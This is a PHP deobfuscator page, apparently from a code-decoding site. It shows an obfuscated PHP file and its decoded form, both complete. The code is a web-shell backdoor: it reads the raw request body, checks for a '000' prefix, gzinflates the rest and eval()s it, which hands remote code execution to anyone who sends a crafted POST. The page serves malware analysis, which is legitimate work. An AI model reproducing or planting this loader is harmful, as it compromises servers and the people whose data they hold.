Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ykIws; keuTP: goto LPmWl; goto kmSu4; OifKe: fPxGE: goto myots; Lmqbm: PV9wx:..

Decoded Output download

<?php 
 goto ykIws; keuTP: goto LPmWl; goto kmSu4; OifKe: fPxGE: goto myots; Lmqbm: PV9wx: goto UqUwM; pvbrj: ${"GLOBALS"}["ubozwyjaj"] = "command"; goto l3Ip7; sD0Sj: goto Qk7LO; goto HHjHB; mo3x5: NT_2J: goto xnZSr; BTIHK: goto NT_2J; goto ZFaz9; aazTY: $ginubdtj = "rawData"; goto ltQ1s; rn435: DEKvv: goto vl4iw; ZFaz9: tUN5F: goto p1x2R; YVRgs: ${"GLOBALS"}["twtsyv"] = "rawData"; goto lU8Qc; p1x2R: cdqsJ: goto qGoWp; oPLmX: goto o7NK0; goto yrehC; QouA1: goto Duv7S; goto gHxlJ; ykIws: goto JTVe0; goto K3Hds; hffx7: goto uOpnK; goto nxWbN; VkUEu: goto tUN5F; goto rn435; wyFjD: goto WIZD1; goto lmeiA; AxAPp: VKY1S: goto bzsKF; Ab5Z1: rxZGl: goto pvbrj; aKTiF: LW7yh: goto vqzd3; bXMDt: LnglU: goto YVRgs; lmeiA: Om1jL: goto CEPx2; QJwPR: SJvwk: goto Lhwe4; k78kP: ${"GLOBALS"}["bxnrvykym"] = "rawData"; goto NfWVs; kmSu4: o7NK0: goto aazTY; nxWbN: LPmWl: goto QJwPR; Ofe2E: JTVe0: goto kTvdZ; vqzd3: goto dG_2k; goto r9eh7; e_fXp: vCaTY: goto M2J10; bfsRv: goto VKY1S; goto aKTiF; sQi_E: goto BaS06; goto Ofe2E; myots: goto yuRy_; goto msQvx; kTvdZ: goto cdqsJ; goto bfsRv; m664_: ${$ginubdtj} = file_get_contents("php://input"); goto sD0Sj; GucYM: goto lXI7S; goto VkUEu; If6OH: goto SJvwk; goto BTIHK; vl4iw: Qs5Nw: goto oPLmX; ltQ1s: goto LW7yh; goto OifKe; Ds7OK: dG_2k: goto hffx7; tbf5k: WIZD1: goto u2N8a; UqUwM: HCX36: goto vb8ID; K3Hds: Duv7S: goto GucYM; gHxlJ: BaS06: goto Ds7OK; msQvx: goto DEKvv; goto e_fXp; NfWVs: goto vCaTY; goto lhfW_; r9eh7: goto PV9wx; goto AxAPp; lU8Qc: goto XqGpt; goto w50Kd; qGoWp: goto rxZGl; goto Lmqbm; M2J10: goto Qs5Nw; goto sQi_E; HHjHB: Qk7LO: goto Y_HDp; CEPx2: if (substr(${${"GLOBALS"}["twtsyv"]}, 0, 3) == "000") { ${"GLOBALS"}["cdwhbznblsyv"] = "uncompressed"; ${"GLOBALS"}["ghewpkixehx"] = "uncompressed"; ${${"GLOBALS"}["cdwhbznblsyv"]} = gzinflate(substr(${${"GLOBALS"}["bxnrvykym"]}, 3)); @(${${"GLOBALS"}["ubozwyjaj"]} = ${${"GLOBALS"}["ghewpkixehx"]}); try { eval(${${"GLOBALS"}["ubozwyjaj"]}); } catch (MyException $e) { } } goto QouA1; Y_HDp: goto HCX36; goto keuTP; bzsKF: yuRy_: goto qF8zT; lhfW_: XqGpt: goto If6OH; vb8ID: goto LnglU; goto mo3x5; xnZSr: lXI7S: goto wyFjD; w50Kd: Zl8tI: goto k78kP; yrehC: uOpnK: goto m664_; qF8zT: goto Zl8tI; goto Ab5Z1; l3Ip7: goto fPxGE; goto bXMDt; Lhwe4: goto Om1jL; goto tbf5k; u2N8a: ?>

Did this file decode correctly?

Original Code

<?php
 goto ykIws; keuTP: goto LPmWl; goto kmSu4; OifKe: fPxGE: goto myots; Lmqbm: PV9wx: goto UqUwM; pvbrj: ${"\107\114\x4f\x42\x41\114\x53"}["\165\x62\x6f\x7a\167\171\152\141\x6a"] = "\x63\x6f\155\x6d\x61\x6e\144"; goto l3Ip7; sD0Sj: goto Qk7LO; goto HHjHB; mo3x5: NT_2J: goto xnZSr; BTIHK: goto NT_2J; goto ZFaz9; aazTY: $ginubdtj = "\162\x61\x77\x44\x61\x74\x61"; goto ltQ1s; rn435: DEKvv: goto vl4iw; ZFaz9: tUN5F: goto p1x2R; YVRgs: ${"\x47\114\117\102\101\114\x53"}["\164\167\164\163\x79\166"] = "\x72\141\167\104\141\164\x61"; goto lU8Qc; p1x2R: cdqsJ: goto qGoWp; oPLmX: goto o7NK0; goto yrehC; QouA1: goto Duv7S; goto gHxlJ; ykIws: goto JTVe0; goto K3Hds; hffx7: goto uOpnK; goto nxWbN; VkUEu: goto tUN5F; goto rn435; wyFjD: goto WIZD1; goto lmeiA; AxAPp: VKY1S: goto bzsKF; Ab5Z1: rxZGl: goto pvbrj; aKTiF: LW7yh: goto vqzd3; bXMDt: LnglU: goto YVRgs; lmeiA: Om1jL: goto CEPx2; QJwPR: SJvwk: goto Lhwe4; k78kP: ${"\107\x4c\117\x42\101\114\x53"}["\x62\x78\x6e\162\166\171\x6b\171\155"] = "\162\x61\x77\x44\141\x74\141"; goto NfWVs; kmSu4: o7NK0: goto aazTY; nxWbN: LPmWl: goto QJwPR; Ofe2E: JTVe0: goto kTvdZ; vqzd3: goto dG_2k; goto r9eh7; e_fXp: vCaTY: goto M2J10; bfsRv: goto VKY1S; goto aKTiF; sQi_E: goto BaS06; goto Ofe2E; myots: goto yuRy_; goto msQvx; kTvdZ: goto cdqsJ; goto bfsRv; m664_: ${$ginubdtj} = file_get_contents("\x70\150\x70\x3a\x2f\x2f\x69\156\160\165\x74"); goto sD0Sj; GucYM: goto lXI7S; goto VkUEu; If6OH: goto SJvwk; goto BTIHK; vl4iw: Qs5Nw: goto oPLmX; ltQ1s: goto LW7yh; goto OifKe; Ds7OK: dG_2k: goto hffx7; tbf5k: WIZD1: goto u2N8a; UqUwM: HCX36: goto vb8ID; K3Hds: Duv7S: goto GucYM; gHxlJ: BaS06: goto Ds7OK; msQvx: goto DEKvv; goto e_fXp; NfWVs: goto vCaTY; goto lhfW_; r9eh7: goto PV9wx; goto AxAPp; lU8Qc: goto XqGpt; goto w50Kd; qGoWp: goto rxZGl; goto Lmqbm; M2J10: goto Qs5Nw; goto sQi_E; HHjHB: Qk7LO: goto Y_HDp; CEPx2: if (substr(${${"\107\114\117\x42\x41\x4c\x53"}["\164\x77\164\163\x79\166"]}, 0, 3) == "\60\60\x30") { ${"\x47\x4c\117\x42\x41\114\123"}["\x63\x64\167\x68\x62\x7a\x6e\142\x6c\x73\x79\x76"] = "\165\156\143\157\155\x70\x72\145\163\163\x65\x64"; ${"\x47\114\x4f\x42\x41\114\x53"}["\x67\150\145\x77\x70\153\151\x78\x65\x68\x78"] = "\165\x6e\x63\157\155\160\162\145\x73\x73\145\144"; ${${"\x47\114\117\x42\101\x4c\x53"}["\x63\x64\x77\150\x62\172\156\142\x6c\163\171\x76"]} = gzinflate(substr(${${"\x47\114\117\x42\101\x4c\123"}["\x62\170\x6e\162\166\x79\x6b\171\155"]}, 3)); @(${${"\107\114\x4f\x42\101\x4c\123"}["\165\142\157\x7a\167\171\152\x61\152"]} = ${${"\107\114\117\102\101\114\x53"}["\x67\150\x65\167\x70\x6b\x69\170\145\150\170"]}); try { eval(${${"\x47\x4c\117\102\x41\114\123"}["\x75\142\157\x7a\x77\x79\152\141\152"]}); } catch (MyException $e) { } } goto QouA1; Y_HDp: goto HCX36; goto keuTP; bzsKF: yuRy_: goto qF8zT; lhfW_: XqGpt: goto If6OH; vb8ID: goto LnglU; goto mo3x5; xnZSr: lXI7S: goto wyFjD; w50Kd: Zl8tI: goto k78kP; yrehC: uOpnK: goto m664_; qF8zT: goto Zl8tI; goto Ab5Z1; l3Ip7: goto fPxGE; goto bXMDt; Lhwe4: goto Om1jL; goto tbf5k; u2N8a: ?>

Function Calls

None

Variables

None

Stats

MD5 190d96846294422ad6812b1f74b4c8c0
Eval Count 0
Decode Time 103 ms